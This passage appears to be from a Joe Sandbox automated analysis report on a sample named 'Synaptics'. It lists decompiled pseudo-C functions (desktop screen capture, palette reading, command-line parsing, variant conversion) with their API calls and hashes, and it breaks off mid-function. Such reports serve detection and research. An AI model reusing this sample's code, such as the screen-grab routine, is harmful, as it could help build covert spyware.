                                                                                                                                                                                                                            • Instruction ID: f210b0e3c06df9566387ab9d1a3fb44fb9a992e98e90bafaba036239795fc9e8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab44610fbabe63d1efb5402cb7d40d97d5a42581b57647a3f1f398fe194eb632
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B510971740214AFDB40FF69DD82F9E37ACAF08714F54015AF904EB286CA78ED458B69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 43%
                                                                                                                                                                                                                            			E004751FC() {
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                            				short _t34;
                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                            				short* _t51;
                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                            				short _t53;
                                                                                                                                                                                                                            				struct tagRECT* _t54;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				GetWindowRect(GetDesktopWindow(), _t54);
                                                                                                                                                                                                                            				_t39 = E00429914(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_t39 + 0x40))();
                                                                                                                                                                                                                            				_t20 =  *((intOrPtr*)( *_t39 + 0x34))();
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_t52 = _t20;
                                                                                                                                                                                                                            				_push(0x26);
                                                                                                                                                                                                                            				_push(_t52);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				if((_t20 & 0x00000100) == 0x100) {
                                                                                                                                                                                                                            					_t51 = E0040275C(0x404);
                                                                                                                                                                                                                            					E004032B4(_t51, 0x404);
                                                                                                                                                                                                                            					 *_t51 = 0x300;
                                                                                                                                                                                                                            					_t34 = _t51 + 4;
                                                                                                                                                                                                                            					_push(_t34);
                                                                                                                                                                                                                            					_push(0x100);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_t52);
                                                                                                                                                                                                                            					L004073C0();
                                                                                                                                                                                                                            					_t53 = _t34;
                                                                                                                                                                                                                            					 *((short*)(_t51 + 2)) = _t53;
                                                                                                                                                                                                                            					if(_t53 != 0) {
                                                                                                                                                                                                                            						L00407308();
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_t39 + 0x38))(_t51);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0040277C(_t51);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(0xcc0020);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(_t52);
                                                                                                                                                                                                                            				_push(_v32 - _v40);
                                                                                                                                                                                                                            				_push(_v36 - _v44);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(E00425C68(E00429EDC(_t39)));
                                                                                                                                                                                                                            				L004072B8();
                                                                                                                                                                                                                            				_push(_t52);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				return _t39;
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00475204
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 0047520A
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0047523C
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,00000026,00000000), ref: 00475246
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475282
                                                                                                                                                                                                                            • 73C9A8F0.GDI32(00000000,00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475293
                                                                                                                                                                                                                            • 73CA97E0.GDI32(00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752D5
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752DD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$B380DesktopRect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2454875651-0
                                                                                                                                                                                                                            • Opcode ID: b010c522aae21e05d9ca0b7fda6b020350c35e4439bfa40056778aebef1b6fa8
                                                                                                                                                                                                                            • Instruction ID: cf87fae2104b332fff4ea17414f726447bb42f5c33e6fb1eed0e3625bbc1caf8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b010c522aae21e05d9ca0b7fda6b020350c35e4439bfa40056778aebef1b6fa8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 222162317442016FD311FA79CC86F5E77989F89314F50453DFA48EB2C2CA79AC0587AA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                                                                                                            			E004265A0(void* __ebx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v1000;
                                                                                                                                                                                                                            				char _v1004;
                                                                                                                                                                                                                            				char _v1032;
                                                                                                                                                                                                                            				signed int _v1034;
                                                                                                                                                                                                                            				short _v1036;
                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				void* _t55;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t54 = _t55;
                                                                                                                                                                                                                            				_v1036 = 0x300;
                                                                                                                                                                                                                            				_v1034 = 0x10;
                                                                                                                                                                                                                            				_t25 = E004029DC(_t24, 0x40,  &_v1032);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_v8 = _t25;
                                                                                                                                                                                                                            				_push(_t54);
                                                                                                                                                                                                                            				_push(0x42669d);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t55 + 0xfffffbf8;
                                                                                                                                                                                                                            				_push(0x68);
                                                                                                                                                                                                                            				_t27 = _v8;
                                                                                                                                                                                                                            				_push(_t27);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				_t45 = _t27;
                                                                                                                                                                                                                            				if(_t45 >= 0x10) {
                                                                                                                                                                                                                            					_push( &_v1032);
                                                                                                                                                                                                                            					_push(8);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                                                                            					L004073C0();
                                                                                                                                                                                                                            					if(_v1004 != 0xc0c0c0) {
                                                                                                                                                                                                                            						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                                                                                                                                                                                                            						_push(8);
                                                                                                                                                                                                                            						_push(_t45 - 8);
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						L004073C0();
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push( &_v1004);
                                                                                                                                                                                                                            						_push(1);
                                                                                                                                                                                                                            						_push(_t45 - 8);
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						L004073C0();
                                                                                                                                                                                                                            						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                                                                                                                                                                                                            						_push(7);
                                                                                                                                                                                                                            						_push(_t45 - 7);
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						L004073C0();
                                                                                                                                                                                                                            						_push( &_v1000);
                                                                                                                                                                                                                            						_push(1);
                                                                                                                                                                                                                            						_push(7);
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						L004073C0();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t52);
                                                                                                                                                                                                                            				 *[fs:eax] = _t52;
                                                                                                                                                                                                                            				_push(0x4266a4);
                                                                                                                                                                                                                            				_t29 = _v8;
                                                                                                                                                                                                                            				_push(_t29);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				return _t29;
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 004265CE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,00000068,00000000,0042669D,?,00000000), ref: 004265EA
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 00426609
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042662D
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D), ref: 0042664B
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0042665F
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042667F
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,004266A4,0042669D,?,00000000), ref: 00426697
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: 6fb2f2ebad3923b2675d5100b93e3e3b3c14a84b95167fdc7a6b0f3afa72cc61
                                                                                                                                                                                                                            • Instruction ID: 805600ea143b9581a1e299db5fe5220b0691e616ed58bf122693d2d560596f25
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fb2f2ebad3923b2675d5100b93e3e3b3c14a84b95167fdc7a6b0f3afa72cc61
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 592174B1A04218FAEB10DBA5CD85F9E72ACEB08704F5104A6FB04F61C1D678AE54DB29
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402A1C(CHAR* __eax, intOrPtr* __edx) {
                                                                                                                                                                                                                            				char _t5;
                                                                                                                                                                                                                            				char _t6;
                                                                                                                                                                                                                            				CHAR* _t7;
                                                                                                                                                                                                                            				char _t9;
                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                            				char _t14;
                                                                                                                                                                                                                            				CHAR* _t15;
                                                                                                                                                                                                                            				char _t17;
                                                                                                                                                                                                                            				CHAR* _t19;
                                                                                                                                                                                                                            				CHAR* _t22;
                                                                                                                                                                                                                            				CHAR* _t23;
                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                            				intOrPtr* _t34;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t34 = __edx;
                                                                                                                                                                                                                            				_t22 = __eax;
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                            					_t5 =  *_t22;
                                                                                                                                                                                                                            					if(_t5 != 0 && _t5 <= 0x20) {
                                                                                                                                                                                                                            						_t22 = CharNextA(_t22);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                                                                                                                                                                                                                            						_t36 = 0;
                                                                                                                                                                                                                            						_t32 = _t22;
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							_t6 =  *_t22;
                                                                                                                                                                                                                            							if(_t6 <= 0x20) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_t6 != 0x22) {
                                                                                                                                                                                                                            								_t7 = CharNextA(_t22);
                                                                                                                                                                                                                            								_t36 = _t36 + _t7 - _t22;
                                                                                                                                                                                                                            								_t22 = _t7;
                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t22 = CharNextA(_t22);
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								_t9 =  *_t22;
                                                                                                                                                                                                                            								if(_t9 == 0 || _t9 == 0x22) {
                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t11 = CharNextA(_t22);
                                                                                                                                                                                                                            								_t36 = _t36 + _t11 - _t22;
                                                                                                                                                                                                                            								_t22 = _t11;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if( *_t22 != 0) {
                                                                                                                                                                                                                            								_t22 = CharNextA(_t22);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E0040500C(_t34, _t36);
                                                                                                                                                                                                                            						_t23 = _t32;
                                                                                                                                                                                                                            						_t33 =  *_t34;
                                                                                                                                                                                                                            						_t35 = 0;
                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                            							_t14 =  *_t23;
                                                                                                                                                                                                                            							if(_t14 <= 0x20) {
                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_t14 != 0x22) {
                                                                                                                                                                                                                            								_t15 = CharNextA(_t23);
                                                                                                                                                                                                                            								if(_t15 <= _t23) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L27;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                            									 *((char*)(_t33 + _t35)) =  *_t23;
                                                                                                                                                                                                                            									_t23 =  &(_t23[1]);
                                                                                                                                                                                                                            									_t35 = _t35 + 1;
                                                                                                                                                                                                                            								} while (_t15 > _t23);
                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t23 = CharNextA(_t23);
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								_t17 =  *_t23;
                                                                                                                                                                                                                            								if(_t17 == 0 || _t17 == 0x22) {
                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t19 = CharNextA(_t23);
                                                                                                                                                                                                                            								if(_t19 <= _t23) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L21;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                            									L21:
                                                                                                                                                                                                                            									 *((char*)(_t33 + _t35)) =  *_t23;
                                                                                                                                                                                                                            									_t23 =  &(_t23[1]);
                                                                                                                                                                                                                            									_t35 = _t35 + 1;
                                                                                                                                                                                                                            								} while (_t19 > _t23);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if( *_t23 != 0) {
                                                                                                                                                                                                                            								_t23 = CharNextA(_t23);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						return _t23;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t22 =  &(_t22[2]);
                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            0x00402a77
                                                                                                                                                                                                                            0x00402a9b
                                                                                                                                                                                                                            0x00402aa0
                                                                                                                                                                                                                            0x00402aa2
                                                                                                                                                                                                                            0x00402aa4
                                                                                                                                                                                                                            0x00402af9
                                                                                                                                                                                                                            0x00402af9
                                                                                                                                                                                                                            0x00402afd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aaa
                                                                                                                                                                                                                            0x00402ae5
                                                                                                                                                                                                                            0x00402aec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402af0
                                                                                                                                                                                                                            0x00402af3
                                                                                                                                                                                                                            0x00402af4
                                                                                                                                                                                                                            0x00402af5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402ab2
                                                                                                                                                                                                                            0x00402acb
                                                                                                                                                                                                                            0x00402acb
                                                                                                                                                                                                                            0x00402acf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ab7
                                                                                                                                                                                                                            0x00402abe
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ac2
                                                                                                                                                                                                                            0x00402ac5
                                                                                                                                                                                                                            0x00402ac6
                                                                                                                                                                                                                            0x00402ac7
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ad8
                                                                                                                                                                                                                            0x00402ae0
                                                                                                                                                                                                                            0x00402ae0
                                                                                                                                                                                                                            0x00402ad8
                                                                                                                                                                                                                            0x00402b05
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00402a3b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,00402BAE), ref: 00402A53
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402A5D
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402A7A
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,00402BAE), ref: 00402A84
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402AAD
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402AB7
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402ADB
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402AE5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3213498283-0
                                                                                                                                                                                                                            • Opcode ID: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                                                            • Instruction ID: 7f4eabc370d0c2b1a65279813ceea620399496a62879659d683f8910f88fef49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3621E5447443D21ADF7169B90EC83A76B894B5A31872804BB9582B63CBDCFC48479B6E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 69%
                                                                                                                                                                                                                            			E004166D4(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                                                                                                                                                                                                            				signed short* _v8;
                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                            				signed int _v18;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed short _t136;
                                                                                                                                                                                                                            				signed short* _t256;
                                                                                                                                                                                                                            				intOrPtr _t307;
                                                                                                                                                                                                                            				intOrPtr _t310;
                                                                                                                                                                                                                            				intOrPtr _t318;
                                                                                                                                                                                                                            				intOrPtr _t325;
                                                                                                                                                                                                                            				intOrPtr _t333;
                                                                                                                                                                                                                            				signed int _t338;
                                                                                                                                                                                                                            				void* _t346;
                                                                                                                                                                                                                            				void* _t348;
                                                                                                                                                                                                                            				intOrPtr _t349;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t353 = __fp0;
                                                                                                                                                                                                                            				_t346 = _t348;
                                                                                                                                                                                                                            				_t349 = _t348 + 0xffffffd8;
                                                                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t256 = __eax;
                                                                                                                                                                                                                            				_v13 = 1;
                                                                                                                                                                                                                            				_t338 =  *((intOrPtr*)(__eax));
                                                                                                                                                                                                                            				if((_t338 & 0x00000fff) >= 0x10f) {
                                                                                                                                                                                                                            					_t136 =  *_v8;
                                                                                                                                                                                                                            					if(_t136 != 0) {
                                                                                                                                                                                                                            						if(_t136 != 1) {
                                                                                                                                                                                                                            							_t53 =  &_v24; // 0x416b58
                                                                                                                                                                                                                            							if(E0041713C(_t338, _t53) != 0) {
                                                                                                                                                                                                                            								_push( &_v18);
                                                                                                                                                                                                                            								_t56 =  &_v24; // 0x416b58
                                                                                                                                                                                                                            								if( *((intOrPtr*)( *((intOrPtr*)( *_t56)) + 8))() == 0) {
                                                                                                                                                                                                                            									_t341 =  *_v8;
                                                                                                                                                                                                                            									if(( *_v8 & 0x00000fff) >= 0x10f) {
                                                                                                                                                                                                                            										if(E0041713C(_t341,  &_v28) != 0) {
                                                                                                                                                                                                                            											_push( &_v16);
                                                                                                                                                                                                                            											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                                                                                                                                                                                                            												E0041024C(0xb);
                                                                                                                                                                                                                            												goto L46;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												if( *_t256 == _v16) {
                                                                                                                                                                                                                            													_t129 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
                                                                                                                                                                                                                            													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t129));
                                                                                                                                                                                                                            													goto L46;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													_push( &_v44);
                                                                                                                                                                                                                            													L0040F318();
                                                                                                                                                                                                                            													_push(_t346);
                                                                                                                                                                                                                            													_push(0x416ab5);
                                                                                                                                                                                                                            													_push( *[fs:eax]);
                                                                                                                                                                                                                            													 *[fs:eax] = _t349;
                                                                                                                                                                                                                            													_t268 = _v16 & 0x0000ffff;
                                                                                                                                                                                                                            													E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                                                                                                                                                                                                                            													if(_v44 != _v16) {
                                                                                                                                                                                                                            														E0041015C(_t268);
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													_t118 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
                                                                                                                                                                                                                            													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t118));
                                                                                                                                                                                                                            													_pop(_t307);
                                                                                                                                                                                                                            													 *[fs:eax] = _t307;
                                                                                                                                                                                                                            													_push(E00416AE8);
                                                                                                                                                                                                                            													return E004109E8( &_v44);
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											E0041024C(0xb);
                                                                                                                                                                                                                            											goto L46;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_push( &_v44);
                                                                                                                                                                                                                            										L0040F318();
                                                                                                                                                                                                                            										_push(_t346);
                                                                                                                                                                                                                            										_push(0x4169ff);
                                                                                                                                                                                                                            										_push( *[fs:eax]);
                                                                                                                                                                                                                            										 *[fs:eax] = _t349;
                                                                                                                                                                                                                            										_t273 =  *_v8 & 0x0000ffff;
                                                                                                                                                                                                                            										E00411330( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
                                                                                                                                                                                                                            										if( *_v8 != _v44) {
                                                                                                                                                                                                                            											E0041015C(_t273);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_v13 = E00416548( &_v44, _v12, _v8, _t353);
                                                                                                                                                                                                                            										_pop(_t310);
                                                                                                                                                                                                                            										 *[fs:eax] = _t310;
                                                                                                                                                                                                                            										_push(E00416AE8);
                                                                                                                                                                                                                            										return E004109E8( &_v44);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									if( *_v8 == _v18) {
                                                                                                                                                                                                                            										_t79 =  &_v24; // 0x416b58
                                                                                                                                                                                                                            										_t85 = ( *((intOrPtr*)( *((intOrPtr*)( *_t79)) + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
                                                                                                                                                                                                                            										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t85));
                                                                                                                                                                                                                            										goto L46;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_push( &_v44);
                                                                                                                                                                                                                            										L0040F318();
                                                                                                                                                                                                                            										_push(_t346);
                                                                                                                                                                                                                            										_push(0x41695d);
                                                                                                                                                                                                                            										_push( *[fs:eax]);
                                                                                                                                                                                                                            										 *[fs:eax] = _t349;
                                                                                                                                                                                                                            										_t278 = _v18 & 0x0000ffff;
                                                                                                                                                                                                                            										E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
                                                                                                                                                                                                                            										if(_v44 != _v18) {
                                                                                                                                                                                                                            											E0041015C(_t278);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t68 =  &_v24; // 0x416b58
                                                                                                                                                                                                                            										_t74 = ( *((intOrPtr*)( *((intOrPtr*)( *_t68)) + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
                                                                                                                                                                                                                            										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t74));
                                                                                                                                                                                                                            										_pop(_t318);
                                                                                                                                                                                                                            										 *[fs:eax] = _t318;
                                                                                                                                                                                                                            										_push(E00416AE8);
                                                                                                                                                                                                                            										return E004109E8( &_v44);
